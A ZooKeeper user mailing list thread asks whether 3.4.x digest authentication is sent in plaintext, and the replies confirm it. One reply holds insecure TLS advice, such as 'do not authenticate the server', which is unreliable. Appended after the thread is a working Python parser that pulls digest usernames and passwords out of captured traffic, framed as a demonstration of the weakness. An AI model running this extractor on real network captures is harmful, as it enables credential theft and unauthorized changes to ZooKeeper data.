zookeeper-user mailing list archives

From Jan Høydahl <jan....@cominvent.com>
Subject Re: Digest auth with classic TCP transport
Date Thu, 27 Sep 2018 15:14:51 GMT
Thanks.

So what do people typically do to mitigate this? Other than restricting who has access to
this network?

--
Jan Høydahl, search solution architect
Cominvent AS - www.cominvent.com

> 27. sep. 2018 kl. 17:10 skrev Andor Molnar <andor@cloudera.com.INVALID>:
> 
> Right. It's plaintext.
> 
> 
> On Thu, Sep 27, 2018 at 4:54 PM, Jan Høydahl <jan.asf@cominvent.com> wrote:
> 
>> I am *explicitly* asking about old-style 3.4.x socket protocol, not the
>> new Netty transport which I know supports SSL.
>> 
>> My original question was whether authentication credentials are passed in
>> plaintext across the wire and are thus easy for an attacker to pick up.
>> And if that is true, if there are known ways of working around the lack of
>> SSL support for the TCP transport.
>> 
>> Martin Gainty, I cannot see how I can easily plug in TLS1.3 in my existing
>> connection between client and Zookeeper 3.4.x, but if there is a simple way
>> to do so then please share how you did it.
>> 
>> The only solution I see, as we're stuck with 3.4.x, is to setup IPSec
>> tunnels on OS level on all client/server traffic. I wanted to avoid that.
>> 
>> --
>> Jan Høydahl, search solution architect
>> Cominvent AS - www.cominvent.com
>> 
>>> 27. sep. 2018 kl. 16:14 skrev Andor Molnar <andor@cloudera.com.INVALID>:
>>> 
>>> https://cwiki.apache.org/confluence/display/ZOOKEEPER/ZooKeeper+SSL+User+Guide
>>> 
>>> SSL (client-server) has been added in 3.5.1
>>> SSL server-server support is being reviewed on GitHub.
>>> 
>>> Regards,
>>> Andor
>>> 
>>> 
>>> 
>>> On Thu, Sep 27, 2018 at 3:46 PM, Jan Høydahl <jan.asf@cominvent.com> wrote:
>>> 
>>>> Hi,
>>>> 
>>>>> if you're prevented from implementing SSL why not use TLSv1.3?
>>>> 
>>>> 
>>>> I have not found any evidence that the Zookeeper server or the (Java) client
>>>> supports TLS in version 3.4.13. Please point me to some docs or tutorial.
>>>> We don't want to fork Zookeeper to implement this stuff ourselves :)
>>>> 
>>>> --
>>>> Jan Høydahl, search solution architect
>>>> Cominvent AS - www.cominvent.com
>>>> 
>>>>> 27. sep. 2018 kl. 15:17 skrev Martin Gainty <mgainty@hotmail.com>:
>>>>> 
>>>>> 
>>>>> ________________________________
>>>>> From: Jan Høydahl <jan.asf@cominvent.com>
>>>>> Sent: Thursday, September 27, 2018 5:12 AM
>>>>> To: user@zookeeper.apache.org
>>>>> Subject: Digest auth with classic TCP transport
>>>>> 
>>>>> Hi
>>>>> 
>>>>> We use ZK 3.4.13, and unfortunately cannot use Netty transport and SSL.
>>>>> We plan to use digest authentication and Zookeeper ACL protection.
>>>>> 
>>>>> Question is, since we cannot use SSL, is there some other way to make
>>>>> sure the user credentials are not sniffed over the network and thus let an
>>>>> attacker impersonate our application and change the content in Zookeeper?
>>>>> Does the Zookeeper client do some smart moves to protect/hash the password
>>>>> over the network? I suppose the binary transport is easy to decipher for
>>>>> those who try.
>>>>> 
>>>>> MG>if you're prevented from implementing SSL why not use TLSv1.3?
>>>>> MG>with TLSv1.3 you can implement encryption/decryption with crypto
>>>>> private/public keys and x509 certs
>>>>> https://en.wikipedia.org/wiki/Transport_Layer_Security
>>>>> Transport Layer Security - Wikipedia<https://en.wikipedia.org/wiki/Transport_Layer_Security>
>>>>> Transport Layer Security (TLS) – and its predecessor, Secure Sockets
>>>>> Layer (SSL), which is now deprecated by the Internet Engineering Task Force
>>>>> (IETF) – are cryptographic protocols that provide communications security
>>>>> over a computer network. Several versions of the protocols find widespread
>>>>> use in applications such as web browsing, email, instant messaging, and
>>>>> voice over IP (VoIP).
>>>>> en.wikipedia.org
>>>>> 
>>>>> 
>>>>> MG>path of least resistance is to contact verisign and ask them to
>>>>> generate keys, certs and allow them to act as CA
>>>>> MG>Caveat: tls1.3 implementation is slow and is supported by Mozilla
>>>>> v60...and some versions of chrome
>>>>> MG>as far as ciphers to prevent MITM do not implement TLS_DH_anon and
>>>>> TLS_ECDH_anon key agreement methods
>>>>> MG>do not authenticate the server
>>>>> MG>you will want public key size to be min 2048bit to conform to chrome
>>>>> secure transmission requirements
>>>>> MG>securing message is done through MD5 or SHA but you will need to
>>>>> incorporate selected algo into
>>>>> MG>supported cipher-suite(s)
>>>>> https://en.wikipedia.org/wiki/Cipher_suite
>>>>> Cipher suite - Wikipedia<https://en.wikipedia.org/wiki/Cipher_suite>
>>>>> A cipher suite is a set of algorithms that help secure a network
>>>>> connection that uses Transport Layer Security (TLS) or Secure Socket Layer
>>>>> (SSL). The set of algorithms that cipher suites usually contain include: a
>>>>> key exchange algorithm, a bulk encryption algorithm, and a message
>>>>> authentication code (MAC) algorithm. The key exchange algorithm is used to
>>>>> exchange a key between two devices.
>>>>> en.wikipedia.org
>>>>> 
>>>>> 
>>>>> HTH
>>>>> Martin
>>>>> --
>>>>> Jan Høydahl
>>>>> Cominvent AS - www.cominvent.com<http://www.cominvent.com>
>>>>> 
>>>> 
>>>> 
>> 
>> 
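
Added example, not part of this thread and not code from the ZooKeeper project, showing concretely what "it's plaintext" means for digest auth on the 3.4.x classic TCP transport: it rebuilds the addAuth request the way the Java client serializes it, then walks a captured client-to-server byte stream and pulls the user and password straight out of it, and finally derives the digest ACL id so you can see that whoever captured the credentials can satisfy the ACL. The packet layout (4-byte big-endian length prefix, RequestHeader {xid, type} with the auth xid -4 and opcode 100, AuthPacket {type, scheme, auth} with jute length-prefixed string and buffer) is my reading of ZooKeeper's jute serialization and is an assumption here, as are the credentials alice:s3cret and the constructed sample stream.

```python
"""Recover ZooKeeper 'digest' credentials from the classic (non-Netty, non-SSL)
transport.  Example code written for this thread, not ZooKeeper's own.

Assumed wire format (jute, big-endian), not taken from the thread:
  packet      = int32 length + RequestHeader + AuthPacket
  RequestHeader = { xid: int32 = -4, type: int32 = 100 }
  AuthPacket    = { type: int32, scheme: ustring, auth: buffer }
  ustring/buffer = int32 length + raw bytes
The digest scheme puts b"user:password" into AuthPacket.auth unchanged.
"""
import base64
import hashlib
import struct

AUTH_XID = -4   # xid the client reserves for addAuth requests (assumption)
OP_AUTH = 100   # OpCode.auth (assumption)
OP_PING = 11    # OpCode.ping, used only for the constructed sample below
PING_XID = -2


def _jute_bytes(b: bytes) -> bytes:
    """jute 'buffer'/'ustring': int32 length followed by the bytes."""
    return struct.pack(">i", len(b)) + b


def build_auth_packet(scheme: str, auth: bytes) -> bytes:
    """Serialize RequestHeader + AuthPacket, with the outer length prefix,
    as the 3.4 client would put it on the socket."""
    body = struct.pack(">ii", AUTH_XID, OP_AUTH)      # RequestHeader
    body += struct.pack(">i", 0)                      # AuthPacket.type (0)
    body += _jute_bytes(scheme.encode("utf-8"))       # AuthPacket.scheme
    body += _jute_bytes(auth)                         # AuthPacket.auth
    return struct.pack(">i", len(body)) + body


def extract_digest_credentials(stream: bytes) -> list:
    """Walk a client->server stream packet by packet (using the length
    prefix to skip everything that is not an auth request) and return
    every (scheme, user, password) sent with the digest scheme."""
    found = []
    off = 0
    while off + 4 <= len(stream):
        (plen,) = struct.unpack_from(">i", stream, off)
        off += 4
        if plen < 8 or off + plen > len(stream):
            break                                     # truncated or garbage
        pkt = stream[off:off + plen]
        off += plen
        xid, op = struct.unpack_from(">ii", pkt, 0)
        if xid != AUTH_XID or op != OP_AUTH:
            continue
        (slen,) = struct.unpack_from(">i", pkt, 12)   # after header + type
        scheme = pkt[16:16 + slen].decode("utf-8")
        (alen,) = struct.unpack_from(">i", pkt, 16 + slen)
        auth = pkt[20 + slen:20 + slen + alen]
        if scheme == "digest" and b":" in auth:
            user, _, password = auth.partition(b":")
            found.append((scheme, user.decode(), password.decode()))
    return found


def acl_digest_id(user: str, password: str) -> str:
    """Id form stored in a digest ACL: user:BASE64(SHA1("user:password")).
    Only the hash lives in the ACL; the wire carries the password itself."""
    h = hashlib.sha1(f"{user}:{password}".encode("utf-8")).digest()
    return f"{user}:{base64.b64encode(h).decode()}"


def sniffed_credentials_satisfy_acl(acl_id: str, user: str, password: str) -> bool:
    """True when a replayed addAuth with these credentials passes the ACL."""
    return acl_digest_id(user, password) == acl_id


# Constructed sample stream (not a real capture): one ping, then the addAuth.
SAMPLE_STREAM = (struct.pack(">i", 8) + struct.pack(">ii", PING_XID, OP_PING)
                 + build_auth_packet("digest", b"alice:s3cret"))

if __name__ == "__main__":
    for scheme, user, pw in extract_digest_credentials(SAMPLE_STREAM):
        acl = acl_digest_id(user, pw)
        print(f"{scheme} credentials on the wire: {user}:{pw}")
        print(f"ACL id they satisfy:           {acl}",
              sniffed_credentials_satisfy_acl(acl, user, pw))
```

The scan is deliberately scheme-aware rather than a regex for "user:pass", because the same jute framing carries every other request; once you can see the framing you can also see that nothing in the client hashes or salts the password before it leaves the process, which is why the only fixes are below the application (IPsec, or the Netty/SSL transport from 3.5.1) or above it (restricting who can reach the ZooKeeper port).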

